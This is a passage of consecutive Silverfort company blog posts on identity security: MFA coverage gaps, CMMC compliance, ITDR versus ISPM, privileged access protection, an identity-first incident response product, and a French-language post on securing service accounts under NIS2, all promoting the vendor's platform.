deployed ransomware. There is a critical lesson to be learned from this example: MFA gaps, particularly in privileged access management (PAM), can lead to catastrophic consequences. With access to a privileged account, attackers can easily execute ransomware or exfiltrate data. Clorox, MoveIt Transfer Software, Zellis Payroll Software, and Change Healthcare are other notable breaches that could have been prevented with a unified approach to MFA. Addressing MFA Gaps: A Unified Approach To combat these security gaps, the AIG & Silverfort white paper emphasizes the need for a unified, comprehensive approach to MFA. Rather than applying MFA selectively or relying on outdated methods, organizations should strive to extend MFA coverage across all resources—cloud, on-premises, legacy systems, and privileged accounts. This involves: Assessing and closing gaps: Conduct a thorough risk analysis to identify misconfigurations and areas where MFA is absent. Prioritizing privileged accounts: Protect administrative and other privileged accounts with stringent MFA policies. Protocol-Agnostic Solutions: Implement MFA solutions that work across all types of authentication protocols, including older systems that use insecure protocols which don’t support modern MFA natively. Phishing-Resistant MFA: Apply advanced MFA methods that are resistant to phishing and social engineering attacks, such as hardware tokens or biometric authentication, rather than relying on SMS-based or telephony-based MFA, which can be intercepted. Preparing for the Future of Identity-Based Attacks Identity will remain a key target for attackers, and without comprehensive MFA coverage, organizations are leaving themselves vulnerable to increasingly sophisticated attacks. By adopting a holistic, unified MFA strategy, companies can significantly reduce their risk of identity-based breaches. Cybersecurity professionals and cyber insurance stakeholders alike must take proactive steps to ensure that every access point, especially those involving privileged accounts, is properly protected. As the threat landscape evolves, so must our defenses—starting with closing the MFA gaps that attackers so often exploit. --- - Published: 2024-10-21 - Modified: 2025-05-04 - URL: https://www.silverfort.com/blog/navigating-cmmc-compliance-how-silverfort-can-streamline-your-journey/ As the threat landscape evolves, attackers are setting their sights on organizations that work closely with critical national infrastructure and governmental agencies. With over 300,000 companies supplying the U. S. Department of Defense (DoD), any breach could pose a significant threat to national security. Organizations – especially those involved in this sprawling supply chain – need to know exactly who is accessing and sharing confidential data while balancing availability with security. To answer these security challenges, the U. S. DoD created the Cybersecurity Maturity Model Certification (CMMC) to help strengthen the security posture of contractors and federal agencies. In this article, you will learn about the CMMC framework and how Silverfort can help organizations align with its identity security requirements. We will focus on the latest CMMC 2. 0 model that was released to the public in October 2024 and will be effective from December 2024. What is the CMMC Framework? The CMMC framework was created by the U. S. DoD in 2020 and is based on the industry leading standards established by the National Institute of Standards and Technology (NIST). It was established to protect two key types of unclassified information disseminating throughout the Defense Industrial Base (DIB) and DoD supply chain: Federal Contract Information (FCI): “Information provided by or generated for the government under contract not intended for public release”, as defined by the DoD. Controlled Unclassified Information (CUI): “Information that requires security of dissemination controls pursuant to and consistent with laws, regulation and government-wide policies”, as defined by the DoD. The CMMC framework consists of 3 certification levels that contractors within DIB sectors need to comply with for gaining bids on the next contracts: Level 1: Foundational Cyber Hygiene This level focuses on implementing fundamental practices with 15 security controls, including basic security measures such as regular password updates, the use of antimalware solutions and safe browsing habits. The goal is to ensure companies put in place essential security controls to protect FCI from common threats. Level 2: Advanced Cyber Hygiene This stage introduces more advanced cybersecurity practices with the basic 17 practices from Level 1 and additional set of 93 practices derived from NIST SP 800-171. It covers security aspects such as access control, incident response and risk management. The goal is to start protecting CUI and to build a stronger security foundation for achieving higher levels of compliance. Level 3: Expert Cyber Hygiene At the highest level, organizations must implement a mature set of cybersecurity practices, comprising 110 controls from Level 2 and additional 24 requirements aligned with NIST SP 800-172 that are designed to manage and mitigate higher risks related to CUI. This level includes advanced security controls such as continuous monitoring, proactive threat detection, and real-time response capabilities. The goal is to establish consistent, repeatable security processes to ensure effective security of CUI across all environments. Let’s focus on the identity security aspects of the CMMC framework. The Identity Security Aspects of CMMC With the frequency and complexity increase of cyberattacks targeting DIB contractors, securing access to sensitive data has never been more crucial for national security. One of the key elements of the CMMC framework is controlling access to classified systems and information by applying robust security controls. This includes implementing Multi-Factor Authentication (MFA), enforcing least privilege principles, and regularly monitoring user activities to prevent unauthorized access. Effective identity security measures help organizations meet CMMC requirements, ultimately protecting their environments against insider threats and external cyberattacks. To address the importance of identity security, the CMMC framework provides the following guidelines to organizations: Access Control (AC) Organizations must establish security policies that limit access to all systems and resources to only authorized users, devices, and processes based on their roles: Organizations should define and manage security policies for user access permissions and authorizations following the least privilege. Organizations should manage all remote access authentications by routing them through secure access control points. Organizations should enforce user session controls, including session terminations and prevention of unauthorized execution of privileged functions. Audit and Accountability (AU) Organizations must ensure that all user actions on information systems are traceable and auditable to maintain accountability: Organizations should enable system audit logging with log protection from unauthorized system access and modifications to ensure user actions are traceable. Organizations should review and analyze audit logs regularly and automate alerts for suspicious or unauthorized activities. Organizations should limit audit logging management to privileged users and ensure logs are reviewed and updated systematically for accurate monitoring. Identity and Authentication (IA) Organizations must identify and authenticate users, devices, and processes to ensure only verified identities can access sensitive systems: Organizations should verify all types of users, including human, machine-to-machine, and non-human identities, to grant access to systems only to authorized users. Organizations should enable multi-factor authentication for privileged accounts and non-privileged network access. Organizations use replay-resistant authentication mechanisms to safeguard both privileged and non-privileged accounts from unauthorized access. Incident Response (IR) To cover the full incident lifecycle, including preparation, detection, analysis, and recovery, organizations must establish a robust incident-handling process: Organizations should perform root cause analysis and use forensic data to investigate incidents while protecting the integrity of that data. Organizations should combine manual and automated responses to quickly address and mitigate anomalous activities matching incident patterns. System and Configuration Protection (SC) Organizations must protect the integrity and authenticity of communication sessions and ensure that system management functions are isolated from user functions: Organizations should monitor and control network traffic by enforcing deny policies and protecting communication authenticity. Organizations should apply boundary protections and enforce compliance with network protocols and port usage to secure system communications. Become CMMC Compliant with Silverfort 1. Access Control (AC) Silverfort enables administrators to assign access control policies to each user, defining which resources, devices, or services the user can access. These policies can be enforced in real time based on specific user roles, including privileged accounts, risk scenarios, and organizational security policies. Silverfort’s access control policies can be applied to every authentication within the organizational environment. By enforcing pre-defined policies, alerting, MFA, or blocking access can be enabled to protect insecure authentication to critical resources. 2. Audit and Accountability (AU) With Silverfort you can gain visibility into all authentication and access activities logs across all environments. With integrations with SIEM tools, Silverfort provides continuous monitoring and reviewing of all logged events, ensuring logs are regularly analyzed for anomalies or security incidents. Silverfort enables administrators to customize and update the audit log policies, ensuring new types of events or threats are captured and the audit logs are in line with evolving security requirements. 3. Identity and Authentication (IA) Silverfort authenticates every user’s identity by enforcing strong MFA across all systems, even those that don’t natively support modern authentication protocols. This ensures every user must verify their identity before accessing resources. By enforcing MFA and logging all user activities across all environments, Silverfort ensures no access is granted based on passwords alone, and users are required to authenticate through MFA to verify that they are who they claim to be. Also, Silverfort provides an in-depth identity inventory that displays types of users and resources in the organization’s environment. This enables organizations to quickly detect and respond to malicious activities, including blocking access of any accounts that display anomalous behavior. 4. Incident Response (IR)  Silverfort assists with incident analysis by providing detailed logs of all authentication and access activities. This allows security teams to understand what occurred during an incident and determine the root cause. Using comprehensive data on user access requests and behaviors, Silverfort facilitates a comprehensive investigation and understanding of the events leading up to and during a security incident. Silverfort’s real-time monitoring capabilities enable it to detect anomalies and suspicious activities, providing insights into the course of an incident. As a result of this detailed analysis, it is possible to pinpoint the exact nature and origin of the problem, thereby facilitating effective remediation and strengthening security overall. 5. System and Configuration Protection (SC) Silverfort monitors every access event, including access to the external and internal boundaries of the information systems. It provides visibility to these access events and allows the configuration of policies to control and protect these communications with advanced access controls and secure authentication. Want to learn more about how Silverfort can help you address the identity security aspects of the CMMC Framework? Download the whitepaper or schedule a call with one of our experts. --- - Published: 2024-10-15 - Modified: 2024-10-16 - URL: https://www.silverfort.com/blog/itdr-and-ispm-the-best-of-both-worlds/ At first glance, Identity Threat Detection and Response (ITDR) and Identity Security Posture Management (ISPM) sound like two names for the same thing (because one thing we really need in cybersecurity is more acronyms). While they do share some similarities – like a keen eye for trouble – they each play a very specific role in identity security and solve very different problems. But that's exactly why they complement each other so well. In this article, we'll break down what each does, how they work together, and why you can’t afford to not know these differences. ISPM: Proactively Reducing the Identity Attack Surface ISPM's primary function is to increase visibility into your entire identity infrastructure, including users, resources and permissions, whether on-prem or in the cloud. While ITDR focuses on the real-time response to ongoing threats, ISPM ensures your environment isn’t full of exploitable weaknesses in the first place. ISPM continuously assesses the state of your identity attack surface to identify weaknesses before they are targeted by an actual attack. These weaknesses might include misconfigurations, excessive privileges, malpractices and insecure legacy infrastructure. For example, accounts configured with unconstrained delegation are ideal targets for privilege escalation – something attackers are always interested in as it allows them to acquire higher-level permissions. ISPM, however, can detect such misconfigurations and alert the identity team, giving them the opportunity to fix – or at least mitigate – the issue before any attacks are launched. ITDR: Identifying Ongoing Attacks ITDR is a security solution purpose-built to detect and respond to identity-related TTPs (Tactics, Techniques, and Procedures, as defined by MITRE ATT&CK) targeting credential access, privilege escalation, or lateral movement. For example, attackers often use compromised credentials to gain initial access into an environment, move laterally and spread ransomware. It’s ITDR’s job to detect this flow while it is in progress and, crucially, put a stop to it before too much damage is done. Think of ITDR as an identity watchdog, watching closely over all authentications and access attempts in real time to spot potential malicious presence and activity, such as attempts to access sensitive resources from unauthorized locations. When a threat is detected, ITDR should trigger a response – such as alerting the security team or, even better, locking down the affected accounts – and enable further investigation. ITDR & ISPM: Better Together ITDR and ISPM are two sides of the same coin: mitigation and remediation. As such, they work best when combined. ISPM will continuously monitor and harden your identity infrastructure to reduce your attack surface, while ITDR will detect and respond to active threats. Here's how they work together and why you need both: ITDRISPMDetection of Anomalous Behavior: All users should have an individual behavioral profile and risk score, so ITDR can identify accounts that may have been compromised based on deviations from their normal behavior. Visibility & Inventory: ISPM provides visibility into the organization’s identity attack surface, maintains a detailed inventory of all users, and makes this data available for further exploration and investigation. Detection of TTPs: ITDR can detect TTPs, including Kerberoasting, Pass-the-Hash, Pass-the-Ticket, Brute Force, Credential Scanning, Lateral Movement, and more. Risk Analysis & Remediation: ISPM analyzes, classifies, and prioritizes risks, and offers recommendations for posture remediation and improvement. Investigation & Response: When a user displays suspicious behavior, ITDR can initiate automated response procedures, like blocking the user's access or quarantining compromised users or resources until an investigation is complete. For example, when an endpoint is attacked, ITDR can determine who logged in and which resources were used. Identity Hygiene: Having ISPM gives an organization a 360-degree view of how it's performing when it comes to identity security. ISPM usually uses a scoring system to tell organizations where they stand; as problems are resolved, the ISPM score increases. Applying Theory to Practice: Real-World Examples This is not just a theory. Unfortunately, there are far too many real-world examples that illustrate why you need both ITDR and ISPM. In the 2024 Snowflake breach, for example, attackers used compromised credentials to gain access to critical data (you can read more about this breach here. ) ISPM could have played a major preventative role here. The investigation highlighted a serious absence of MFA – a key weakness that could have been flagged by ISPM and mitigated by enforcing stronger access controls before it became an issue. If the attackers had still succeeded in gaining access to their systems, ITDR would have likely detected it much sooner and given their security teams a head start. Similarly, the 2023 MOVEit Improper Authentication Vulnerability led to authentication bypass and affected numerous organizations, including government agencies, using MOVEit file transfer. While ITDR and ISPM wouldn't have necessarily stopped the initial access, they could have detected the suspicious activity and significantly reduced its impact. For example, if attackers tried to move laterally or interact with systems or data outside of business hours or from unfamiliar locations, ITDR could have detected this. As for ISPM, it continuously assesses the environment to identify misconfigurations and flaws like – as in this case – leaving an application like MOVEit accessible to unauthorized users without additional controls. Final Thoughts ITDR and ISPM work best as a unified force. ISPM strengthens your identity security posture, making you aware of your identity weaknesses before potential attackers, and ITDR gives you the chance to deal with identity threats as they unfold. By working together, they don't just address individual gaps – they fill in the missing pieces toward achieving a unified approach to identity security. --- - Published: 2024-10-09 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/hidden-threats-why-privileged-access-security-should-be-your-top-priority/ It’s no secret that privileged accounts can be an open door to security threats. Yet managing privileged access––not protecting the accounts and users that are entrusted with it––remains the primary focus for most organizations. This is, perhaps, due to the never-ending struggle of most PAM deployments. Whatever the reason, the threat landscape is evolving, and so must their focus. If organizations hope to prevent trust from turning into risk, then the next step of securing privileged access should be their new priority. In this blog, you will learn why managing privileged access alone is not sufficient and come away with the tools to build your own security-first privileged access strategy. The Evolution of Privileged Access Management (PAM)  Privileged Access Management (PAM) has become a critical component in managing organizations' privileged users and critical resources. At its core, PAM focuses on controlling, monitoring, and protecting privileged accounts—those with elevated access to sensitive systems and data. These accounts, which are often held by administrators, provide the keys to critical assets within an organization. Managing these accounts properly is essential to preventing unauthorized access, data breaches, and potential insider threats.   Over the years, PAM has evolved from a simple method of controlling access to a comprehensive system that integrates with other security tools and provides real-time monitoring. Organizations now employ advanced PAM systems that include automated workflows, password vaulting, session monitoring, and threat detection, giving security teams a greater degree of visibility and control over privileged user activities. This evolution has been driven by increasing regulatory demands, the rise of sophisticated cyberattacks, and the growing complexity of IT environments.   Although PAM has become the industry standard for managing privileged access, it is not without its challenges. Why Privileged Access Management Isn’t Enough  With the emergence of increasingly sophisticated cyber threats, relying solely on Privileged Access Management (PAM) is no longer sufficient to secure critical assets and users. The traditional approach to managing privileged accounts focuses on controlling and monitoring who has access, but it does not take into account the evolving threat landscape. It is becoming increasingly common for attackers to target privileged accounts with advanced tactics such as lateral movement, credential theft, and privilege escalation, bypassing many of the controls that PAM is designed to address. Organizations need to evolve from simply managing privileged access to implementing a more proactive approach, where security controls are put in place to protect critical resources and privileged users. This shift requires continuous monitoring, complete visibility into all privileged access, risk-based access control, and real-time response to suspicious activities. While PAM solutions try to mitigate threats like password sharing, weak passwords, and outdated access permissions, they often fall short in addressing advanced persistent threats (APTs) and zero-day vulnerabilities. By focusing on securing privileged accounts at every stage—not just managing their access—organizations can close the security gaps PAM leaves open and secure their most sensitive systems from increasingly sophisticated attacks.   Real-Time Enforcement is the Key to Secure Privileged Access  A security-first approach to privileged access goes beyond the limitations of traditional PAM by addressing the full spectrum of threats associated with privileged accounts. This approach is based on continuous monitoring, automated threat detection, and real-time response––in answer to PAM’s common challenges such as manual processes, poor visibility into real-time threats, and inconsistent enforcement of access policies. As a result, it is more effective at mitigating advanced attacks such as credential theft and lateral movement. Rather than merely managing access, it focuses on securing the privileged accounts themselves, providing a comprehensive and proactive defense against today's sophisticated cyber threats.   The following key features should be considered when choosing a solution to help you solve your PAM-related challenges and build a secure privileged access strategy: Discovery and Classification of Privileged Accounts  The ability to automate the detection and classification of privileged accounts ensures end-to-end visibility and continuous monitoring. It also helps detect whether regular accounts are being used for privileged tasks, enabling prompt action to mitigate risk.   Applying Security Controls to Privileged Access  Enforcing security controls on privileged users and ensuring they have access only when necessary is a key component of privileged access security. Applying strong security controls such as Multi-Factor Authentication (MFA) and access denied can prevent unauthorized access. Real-Time Monitoring  With real-time monitoring of privileged access activity, you can audit and analyze actions taken by privileged users, making it easier to detect unusual behavior and respond immediately to suspicious activity, preventing breaches before they escalate.   Implementing Time-Sensitive Access Policies  Enforcing Zero Standing Privileges (ZSP) and Just-In-Time (JIT) access policies to privileged accounts to grant access only when needed minimizes persistent access risks and reduces the overall attack surface.   Shifting the Mindset to Security-First for Privileged Access  To truly protect privileged users, organizations must shift their focus from simply managing access to prioritizing security through real-time enforcement. By emphasizing security-first strategies like real-time monitoring, automated controls, and just-in-time privileges, you can ensure privileged users are secure and access is tightly controlled. This approach not only reduces risks but also closes security gaps, creating a more resilient environment where security is prioritized over management.   --- - Published: 2024-09-30 - Modified: 2025-02-21 - URL: https://www.silverfort.com/blog/introducing-silverforts-identity-first-incident-response-block-lateral-movement-detect-compromised-accounts-and-accelerate-recovery/ Today I’m excited to announce Silverfort’s Identity-First Incident Response (IR) Solution, which flips the script on the traditional IR process by starting with finding and isolating compromised user identities. Rather than focusing on malware-infected machines first, our solution allows IR teams to quickly identify and contain compromised user identities, the most common entry point for attackers. Designed to complement existing IR tools, this proactive approach drastically reduces the time to contain an attack, minimizes damage, and enables faster recovery.   By starting with identity, IR teams can detect and block authentication attempts to pinpoint compromised accounts and instantly isolate them. This approach allows for quicker identification of threats compared to traditional methods, which often begin with the lengthy and complex process of tracking down infected machines or monitoring network traffic. Once attackers gain access, they can move laterally through your network. Focusing on identity will help reduce damage more quickly and effectively than examining endpoints at first.   Eric Haller, Silverfort advisor and former VP of SecOps & GRC at Palo Alto Networks explains it best:  “Identifying impacted assets while responding to large incidents involving lateral movement is a serious challenge. Often, when deploying containment actions, practitioners must make difficult decisions with incomplete information, balancing attacker damage against business disruption. Being able to immediately challenge all authentication events while allowing business operations to continue is like a surgeon slowing a patient’s heartbeat to perform surgery. You can effectively put an entire company ‘under’ while you investigate the source of the issue – without killing productivity. With Silverfort, teams get actionable telemetry about what needs to be contained so they can keep their businesses operational while they investigate and figure out the best path towards recovery and remediation. ”  How Silverfort Accelerates Incident Response Times  Silverfort’s Identity-First IR solution seamlessly integrates with Identity and Access Management (IAM) systems like Active Directory, Okta, PingFederate  and others, enabling responders to isolate compromised accounts, contain attacks in real time and block further spread, all without needing an extensive investigation.   Here’s a step-by-step breakdown of how Silverfort accelerates incident response:  Step 1: Bring the Attack to an Immediate Halt  Using MFA and identity-based segmentation, organizations can take immediate control over malicious access with Silverfort. This containment stops lateral movement in its tracks, even through tools like PowerShell or PsExec, without requiring deep manual investigation upfront. Blocking access happens instantly to prevent further spread.  With Silverfort’s Authentication Firewall, organizations can block access to resources based on user identity and real-time authentication analysis.   Step 2: Rapidly Identify Compromised Accounts  Attackers will reveal themselves by triggering denied access attempts or blocked MFA challenges. Silverfort provides detailed audit trails so security teams can trace the attacker’s movements back to patient zero. By locating compromised identities early, responders can block further malicious activity and focus their forensic efforts on critical areas.   Step 3: Gradual Recovery and Attack Surface Reduction  As responders eradicate malicious activity, Silverfort helps gradually restore user access while maintaining critical security measures. The platform identifies identity-related weaknesses, such as shadow admins and unmonitored service accounts, to close security gaps and eliminate potential attack paths.   Silverfort’s identity-first IR process  Customer Testimonial: Proven in Real-World Scenarios  One notable example of IR responders successfully using our solution comes from a Fortune 100 financial services company that recently experienced a significant breach. The attackers gained access to critical systems, threatening the security of their environment. The IR team deployed our solution across more than 100 domain controllers in under 12 hours, enforcing an access block policy for all users and resources. This rapid response contained the attack at its current state and prevented further ransomware spread. Rapid containment and threat detection “Silverfort immediately helped us mitigate the impact of compromised users. It was one of the most significant tools we used to analyze authentication flows and determine compromised identities as we brought our Domain Controllers back online,” said an identity leader at the company. “We worked quickly with the IR team to put blocking policies in place over the compromised identities. ”  This real-world case study demonstrates how our identity-first approach drastically shortens incident response timelines, from days and weeks to mere hours, so organizations can recover with minimal disruption.   Integration with Existing Tools and Infrastructure  We designed our solution to complement existing IR tools , and to integrate seamlessly with security operations infrastructure, such as SIEM, SOAR and XDR platforms. Identity-related threat signals enrich existing incident response processes, enhancing the detection and correlation of risk signals across the entire infrastructure.   In crisis scenarios, our Authentication Firewall acts as a “kill switch” by analyzing every authentication and access attempt to critical resources and denying requests from compromised identities. By triggering these policies, IR teams can contain the attack, block further access, and continue investigating with full visibility into what has been compromised.   Silverfort’s real-time blocking policies, forensic insights, and MFA enforcement not only stop an attack in its tracks but also provide the IR team with actionable data to ensure secure recovery.   Expedite Incident Response with Silverfort  Silverfort’s Identity-First Incident Response provides a fresh approach to IR – one that’s faster, more precise, and incredibly effective. By focusing on compromised identities rather than infected machines, security teams stay ahead of attackers. The result? Shorter recovery times, reduced damage, and the confidence to tackle even the most sophisticated threats.   For organizations looking to modernize their incident response strategies, we’re excited to offer a powerful, proven solution that integrates seamlessly with existing infrastructure while delivering unparalleled protection against identity-based attacks. Interested in learning more? Check out our IR playbook or request a demo. Our team will be with you every step of the way.   --- - Published: 2024-09-27 - Modified: 2024-10-01 - URL: https://www.silverfort.com/blog/comment-securiser-les-processus-automatiques-selon-la-transposition-francaise-de-nis2/ Le référentiel de l’ANSSI publié par le MagIT pour les entités assujetties à la directive NIS2 en France mentionne à plusieurs reprises les risques liés aux accès des « processus automatiques ». Objectif #10 : L’entité sécurise les accès distants à ses SI réglementés En l’absence d’un tel objectif, l’entité s’expose, par exemple, à des vols de secrets d’authentification et à des accès illégitimes à ses SIR via les accès distants légitimes des personnels de l’entité, des processus automatiques ou des prestataires de l’entité, pouvant entraîner la dégradation voire l’interruption des activités ou services qu’elle fournit ou encore la divulgation d’informations sensibles. Objectif #13 : L’entité gère les identités et les accès des utilisateurs à ses SI réglementés L’atteinte de cet objectif permet à l’entité de maîtriser les utilisateurs accédant à ses systèmes d’information réglementés, que ces derniers soient internes ou externes à l’entité (par exemple : les prestataires) ainsi que les processus automatiques (par exemple : les agents de supervision ou de sauvegarde) via des mécanismes d’identification et d’authentification à l’état de l’art. L’atteinte de cet objectif permet également à l’entité de maîtriser les accès afin que ces utilisateurs n’accèdent qu’aux seules ressources utiles pour l’accomplissement de leurs missions. A quoi l’ANSSI se réfère-t-elle par cette expression ? Il s’agit clairement de comptes de service – des comptes à part entière dans les annuaires des entreprises, indiscernables à priori des comptes d’employés ordinaires. Mais au contraire des comptes « humains », ces comptes de service accomplissent des tâches automatisées prédéfinies. Par exemple, un agent de sauvegarde s’authentifiera tous les jours à la même heure afin d’extraire les données du SI réglementé et les sauvegarder dans une base de données externe afin de mitiger les dégâts d’un ransomware. Du fait qu’ils opèrent entre différents systèmes informatiques sans l’intervention d’un humain, on désigne souvent ces accès par l’anglicisme « machine-to-machine ». Dans l’objectif #13 de la transposition de NIS2, s’appliquant à toutes les entités (à la fois ‘essentielles’ et ‘importantes’) concernées par la directive, l’ANSSI exige la mise en œuvre de plusieurs mesures censées mitiger les risques liés à ces « processus automatiques ». Cela inclut notamment les points suivants : Les utilisateurs et les processus automatiques accédant aux ressources des systèmes d’information réglementés (SIR) de l’entité importante ou essentielle disposent de comptes individuels. Les utilisateurs peuvent, le cas échéant, disposer de plusieurs comptes individuels. L’emploi d’un compte individuel du SIR est réservé à l’utilisateur ou au processus automatique auquel ce compte a été attribué. Lorsque des raisons techniques ou opérationnelles ne permettent pas de créer de comptes individuels pour les utilisateurs ou pour les processus automatiques, l’entité met en place des mesures permettant de réduire le risque lié à l'utilisation de comptes partagés et d'assurer la traçabilité de l'utilisation de ces comptes. L’entité désactive sans délai les comptes qui ne sont plus nécessaires. L’entité protège les accès des utilisateurs et processus automatiques aux ressources de ses systèmes d’information réglementés (SIR) au moyen d'un mécanisme d'authentification (par exemple : un mécanisme d’authentification mono- ou multi-facteur) impliquant au moins un élément secret (par exemple : un facteur de connaissance tel qu’un mot de passe). Pour chaque utilisateur ou chaque processus automatique, l’entité n'attribue les droits d'accès qu’aux seules ressources nécessaires à la réalisation des activités et services de l’entité ou au maintien en condition opérationnelle ou de sécurité. Lorsque des raisons techniques ou opérationnelles ne permettent pas de modifier l'élément secret , l’entité met en œuvre un contrôle d'accès approprié à la ressource concernée ainsi que des mesures de réduction du risque lié à l'utilisation d'un élément secret d'authentification fixe. Pour chaque ressource du SIR, l’entité n’attribue les droits d’accès qu’aux seuls utilisateurs et processus automatiques justifiant d’un besoin au regard de leurs missions. Il vaut la peine de se pencher sur les raisons justifiant de telles mesures, et sur les difficultés à surmonter dans le cadre de leur implémentation. Enfin, nous montrerons comment Silverfort peut aider à répondre à ces exigences de manière simple et rapide. Pourquoi sécuriser les comptes de service ? Les comptes de service sont immunisés contre plusieurs types d’attaques visant les comptes d’humains. Ils sont incapables de cliquer sur des liens malveillants ou d’être dupés par des tentatives d’usurpation d’identité et d’hameçonnage. Mais cela ne les rend pas pour autant invulnérables. En effet, on constate qu’ils sont utilisés de plus en plus souvent dans des scénarios d’attaques pour réaliser des mouvements latéraux. Pour mentionner un exemple bien connu, prenons l’attaque impliquant SolarWinds en 2020 qui affecta plus de 18 000 clients de la société (dont Microsoft, Cisco, et de nombreux départements gouvernementaux américains). Les attaquants russes, dénommés CozyBear, avaient établi une porte dérobée dans le logiciel Orion que SolarWinds vendait à ses clients, leur permettant ainsi de s’infiltrer dans les SI de chaque entité opérant l’outil. Le logiciel en question employait des comptes de service pour scanner le réseau et accéder à d’autres ressources. CozyBear put donc aisément exploiter ces accès pour se propager et s’implanter chez leurs victimes. Cet exemple illustre très bien les risques que posent ces accès machines. Ils opèrent généralement sans grande supervision. Leur comportement est complètement prédéterminé et prévisible : ils interviennent généralement à la même heure, depuis la même source, et vers la même destination, à intervalle régulière (par exemple, tous les jours à 15h) pour accomplir le « processus automatique » qui leur est confié. Le processus en question étant souvent d’ordre administratif, il nécessite qu’il leur soit octroyés des privilèges élevés. Lorsqu’il s’agit de comptes de service dans le Cloud, leur traçabilité est assurée et les équipes de surveillance peuvent aisément détecter tout comportement anormal. Mais dans l’infrastructure on-premise, plus ancienne, les risques sont plus élevés. Tout d’abord, dans l’annuaire Active Directory de l’entreprise, le seul moyen de les distinguer des comptes humains est par une convention de nommage spécifique. Deuxièmement, il est difficile de surveiller leurs activités au quotidien, de changer leurs mots de passe, ou d’empêcher un individu possédant les identifiants du compte d’y accéder librement. Enfin, ils ne peuvent répondre à une demande d’authentification multi-facteur, comme le font les utilisateurs humains pour s’assurer que leur compte n’a pas été usurpé. On comprend donc pourquoi les attaquants, et également l’ANSSI, considèrent les comptes de service comme une cible stratégique. En devinant ou trouvant leurs mots de passe (parfois stockés négligemment dans des partages de fichiers réseaux), ces comptes deviennent une clé passepartout permettant de se propager librement dans l’infrastructure de leurs victimes et d’y installer des codes malveillants. Quelles mesures les sociétés peuvent-elles mettre en œuvre pour mitiger ces risques ? Et quelles limites risquent-elles de rencontrer en chemin ? Les obstacles à surmonter Des bonnes pratiques d’hygiène des SI et le principe du « moindre privilège » permettent de réduire considérablement les moyens par lesquels les attaquants peuvent obtenir les identifiants des comptes de service et les détourner à des fins malveillantes. Il convient donc de suivre les conventions de nommage pour clairement identifier quels comptes sont effectivement des comptes de service et les distinguer d’accès humains ordinaires, et par la suite, d’analyser leurs privilèges pour s’assurer qu’ils sont appropriés à leur mission. Cependant, même ces simples mesures peuvent être difficile à implémenter rétroactivement pour les comptes les plus anciens, parfois décrits comme « légacy ». La plupart auront été créés avant l’établissement d’une quelconque convention de nommage. Dans les plus grandes entreprises, on en compte probablement des centaines voire des milliers, donc un projet d’analyse et de nettoyage s’avèrerait extrêmement chronophage.   Dans de tels SI, on sait rarement où sont les comptes de service, quelle fonction ils accomplissent, quel est leur mot de passe, et ainsi de suite. Ils continuent d’opérer en arrière-plan, parfois depuis des décennies, à l’insu des responsables informatique. L’ANSSI exige que chaque compte de service soit réservé au processus automatique pour lequel il a été créé, et donc qu’il ne soit pas détourné à d’autres fins. Lorsqu’il s’agit de réaliser des tâches critiques, les administrateurs passent généralement soit par un poste d’administrateur dédié (PAW), soit par un bastion à travers lequel leurs actions sont surveillées et enregistrées. En théorie, aucun utilisateur n’a le droit d’accéder aux ressources sensibles depuis un compte ordinaire – toute tentative serait rejetée. Cependant, les moyens qu’Active Directory propose nativement pour limiter les privilèges des différents comptes de service sont difficiles à implémenter, et l’opacité entourant leur activité au quotidien entraine des risques dans l’élaboration de politiques d’accès (GPO). Si une politique venait par exemple à empêcher l’un de ces comptes d’accéder à une ressource, cela pourrait entraîner la faillite du processus – souvent critique – sur lequel il dépend. Les comptes de service échappent donc souvent aux restrictions s’appliquant aux comptes d’administration humains (PAW, bastion... ), laissant la porte ouverte à leur détournement par des administrateurs peu scrupuleux ou des attaquants. Le cas échéant, peu de moyens existent pour surveiller leurs actions et s’assurer qu’ils n’introduisent pas de vulnérabilités dans le système. Concernant les mots de passe, enfin, Microsoft fournit désormais les moyens de créer des comptes de service « administrés de groupe » (gMSA) avec des changements de mots de passe réguliers. Cependant, certaines limites demeurent : les comptes de service opérant sur des systèmes autre que Windows (notamment Unix/Linux) ne sont pas compatibles, et certains comptes auront un mot de passe codé en dur qu’il est impossible de modifier. Pour résumer, l’ANSSI souhaite que les entités concernées par NIS2 sécurisent leurs comptes de service en assurant : qu’ils soient utilisés exclusivement pour le processus pour lequel ils ont été créé ; qu’ils soient désactivés dès qu’ils ne sont plus nécessaires ; que leurs mots de passe changent régulièrement ; que leurs privilèges soient proportionnels à leur mission. Malheureusement, pour chacune de ces exigences, des limitations en termes de visibilité mènent rapidement à des difficultés dans l’implémentation de ces mesures. Le cas échéant, l’ANSSI requiert que des contrôles appropriés soient mis en œuvre pour mitiger les risques occasionnés. Comment Silverfort sécurise les comptes de service La technologie Silverfort permet d’identifier et de sécuriser les comptes de service de manière rapide et efficace. Pour résoudre les difficultés liées à la visibilité et traçabilité des accès, Silverfort se positionne derrière l’Active Directory (ainsi que d’autres annuaires compatibles), consolide et surveille l’intégralité des authentifications au sein du SI. Ainsi, en l’espace de quelques semaines, nous sommes en mesure d’identifier lorsqu’un compte opère de manière prévisible et répétitive, caractéristique d’un compte de service. Nous les étiquetons, fournissant ainsi rapidement un inventaire complet de tous les comptes de service de l’organisation, incluant ceux qui n’obéissent pas à la convention de nommage. Nous identifions également les comptes « hybrides » : ceux qui s’apparentent à un compte machine mais dont le comportement dévie de la normale de manière spontanée – signe qu’ils sont également utilisés par des humains ; et inversement les comptes nominatifs d’administrateurs depuis lesquels opèrent des processus automatiques. Enfin, nous mettons en lumière toutes les sources depuis lesquelles ces comptes s’authentifient, ainsi que leur(s) destination(s). Cela s’accompagne par un score de risque pour mettre en avant les comptes accédant à des ressources sensibles, ayant des privilèges trop élevés, ou dont le mot de passe n’a pas été changé depuis longtemps. La plateforme fournit ainsi une visibilité accrue aux équipes en charge des identités et de la sécurité. En moins d’un mois, elles auront à leur disposition une liste complète de comptes qui enfreignent les recommandations de l’ANSSI, qu’elles pourront prioriser dans leurs démarches de réduction de risques. Au-delà de l’hygiène, Silverfort propose également des outils redoutables pour sécuriser ces accès machine. En surveillant justement les authentifications en temps réel, notre plateforme peut alerter le SOC dès qu’un compte de service dévie de son comportement habituel. De plus, Silverfort peut mettre en place des contrôles d’accès granulaires sur ces comptes, de manière bien plus simple et chirurgicale que les politiques configurables dans l’Active Directory. Nous donnons les moyens aux équipes responsables de configurer précisément quelles sources et quelles destinations sont autorisées pour chaque compte de service, et également restreindre leurs permissions en fonction de paramètres spécifiques. Ainsi, nous pouvons bloquer toute tentative de déviation d’un compte de service au-delà des fonctions pour lesquelles il a été créé. Si un... --- - Published: 